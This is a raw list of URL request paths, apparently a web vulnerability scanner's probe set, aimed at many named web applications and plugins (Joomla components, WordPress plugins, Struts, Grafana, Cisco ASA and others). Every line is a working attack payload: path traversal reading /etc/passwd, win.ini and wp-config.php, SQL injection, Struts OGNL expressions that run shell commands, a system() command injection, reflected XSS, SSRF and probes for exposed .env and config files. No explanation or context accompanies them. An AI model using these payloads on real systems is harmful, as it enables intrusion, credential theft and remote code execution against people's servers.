/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd
/index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00
/index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_perchaimageattach&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_perchadownloadsattach&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_jradio&controller=../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_canteen&controller=../../../../../etc/passwd%00
/api/v1/repos/search?q=%27)%09UNION%09SELECT%09*%09FROM%09(SELECT%09null)%09AS%09a1%09%09JOIN%09(SELECT%091)%09as%09u%09JOIN%09(SELECT%09user())%09AS%09b1%09JOIN%09(SELECT%09user())%09AS%09b2%09JOIN%09(SELECT%09null)%09as%09a3%09%09JOIN%09(SELECT%09null)%09as%09a4%09%09JOIN%09(SELECT%09null)%09as%09a5%09%09JOIN%09(SELECT%09null)%09as%09a6%09%09JOIN%09(SELECT%09null)%09as%09a7%09%09JOIN%09(SELECT%09null)%09as%09a8%09%09JOIN%09(SELECT%09null)%09as%09a9%09JOIN%09(SELECT%09null)%09as%09a10%09JOIN%09(SELECT%09null)%09as%09a11%09JOIN%09(SELECT%09null)%09as%09a12%09JOIN%09(SELECT%09null)%09as%09a13%09%09JOIN%09(SELECT%09null)%09as%09a14%09%09JOIN%09(SELECT%09null)%09as%09a15%09%09JOIN%09(SELECT%09null)%09as%09a16%09%09JOIN%09(SELECT%09null)%09as%09a17%09%09JOIN%09(SELECT%09null)%09as%09a18%09%09JOIN%09(SELECT%09null)%09as%09a19%09%09JOIN%09(SELECT%09null)%09as%09a20%09%09JOIN%09(SELECT%09null)%09as%09a21%09%09JOIN%09(SELECT%09null)%09as%09a22%09where%09(%27%25%27=%27
/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd
/webmail/old/calendar/minimizer/index.php?script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd
/webmail/old/calendar/minimizer/index.php?style=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd
/wp-admin/tools.php?content=attachment&wp-attachment-export-download=true
/wp-admin/tools.php?content=&wp-attachment-export-download=true
/pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/?option=com_helpdeskpro&task=ticket.download_attachment&filename=/../../../../../../../../../../../../etc/passwd&original_filename=AnyFileName.exe
/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5({{num}})),1)
/XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd
/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php
/.env
/.../.../.../.../.../.../.../.../.../windows/win.ini
/...\...\...\...\...\...\...\...\...\windows\win.ini
/..../..../..../..../..../..../..../..../..../windows/win.ini
/....\....\....\....\....\....\....\....\....\windows\win.ini
/%24%7B%28%23_memberAccess%5B%27allowStaticMethodAccess%27%5D%3Dtrue%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28@java.lang.System@getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%23ros%3D%28@org.apache.struts2.ServletActionContext@getResponse%28%29.getOutputStream%28%29%29%29.%28@org.apache.commons.io.IOUtils@copy%28%23process.getInputStream%28%29%2C%23ros%29%29.%28%23ros.flush%28%29%29%7D/help.action
/%24%7B%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29%29.%28@org.apache.commons.io.IOUtils@toString%28%23a.getInputStream%28%29%29%29%7D/actionChain1.action
/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action
/meta
/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152
/index.php/System/MailConnect/host/{{interactsh-url}}/port/80/secure/
/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD=
/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd
/admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd
/tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd
/_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1#selected
/index.php?option=com_jtagmembersdirectory&task=attachment&download_file=../../../../../../../../../../../etc/passwd
/LetsEncrypt/Index?fileName=/etc/passwd
/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd
/base_import/static/c:/windows/win.ini
/web/static/c:/windows/win.ini
/base/static/c:/windows/win.ini
/catalog.php?filename=../../../../../../../../../etc/passwd
/cgi-bin/config.exp
/../../../../../../etc/passwd
/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini
/?c=../../../../../../etc/passwd%00
/badging/badge_print_v0.php?tpl=../../../../../etc/passwd
/ReportServer/Pages/ReportViewer.aspx
/MicroStrategyWS/happyaxis.jsp
/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
/wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php
/ucmdb-api/connect
/analytics/saw.dll?bieehome&startPage=1
/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd
/../../../../../../../../../../../../windows/win.ini
/infusions/downloads/downloads.php?cat_id=${system(ls)}
/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s
/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua
/index.jsp
/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv
/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini
/?action=dzsap_download&link=../../../../../../../../../../../../../etc/passwd
/.//WEB-INF/classes/META-INF/microprofile-config.properties
/action.php
/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd
/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../windows/win.ini
/public/plugins/alertlist/../../../../../conf/defaults.ini
/apply.cgi
/cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password=
/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=tout
/AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini
/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),1)
/lib/icinga/icinga-php-thirdparty/etc/passwd
/icinga2/lib/icinga/icinga-php-thirdparty/etc/passwd
/icinga-web/lib/icinga/icinga-php-thirdparty/etc/passwd
/module/api.php?mobile/webNasIPS
/modules/blockwishlist/config.xml
/test.txt
/?doAs=`{{url_encode(
/perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url=http://oast.fun/esmond/perfsonar/archive/../../../&src=8.8.8.8&dest=8.8.4.4
/pentaho/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{T(java.net.InetAddress).getByName(
/ExportReportingManager.aspx
/_admin/imgdownload.php?filename=imgdownload.php
/.cpr/%2Fetc%2Fpasswd
/mgmnt/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
/device/config
/avatar_uploader.pages.inc?file=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E
/webadmin/reporter/view_server_log.php?server=localhost&act=stats&filename=&offset=1&count=1000&sortorder=&log=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&offset=&sortitem=&filter=
/loyalty_enu/start.swe/%3E%22%3E%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/api/downloads?fileName=../../../../../../../../etc/passwd
/v12/setup/temp/admin.php
/dlibrary/null?oldfile=../../../../../../windows/win.ini&library=null
/Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%5Cwin.ini
/Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=aaa
/index.dhtml?sponsor=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/pub/bscw.cgi/30?op=theme&style_name=../../../../../../../../etc/passwd
/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik
/pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik
/index.php?action=login.index
/tiki-5.2/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E
/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
/guest/users/forgotten?email=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E
/wt3/forceSave.php?file=/etc/passwd
/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php
/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php?file=../../../wp-config.php
/wp-content/themes/diarise/download.php?calendar=file:///etc/passwd
/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10
/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php
/wp-content/force-download.php?file=../wp-config.php
/wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=/etc/passwd%00
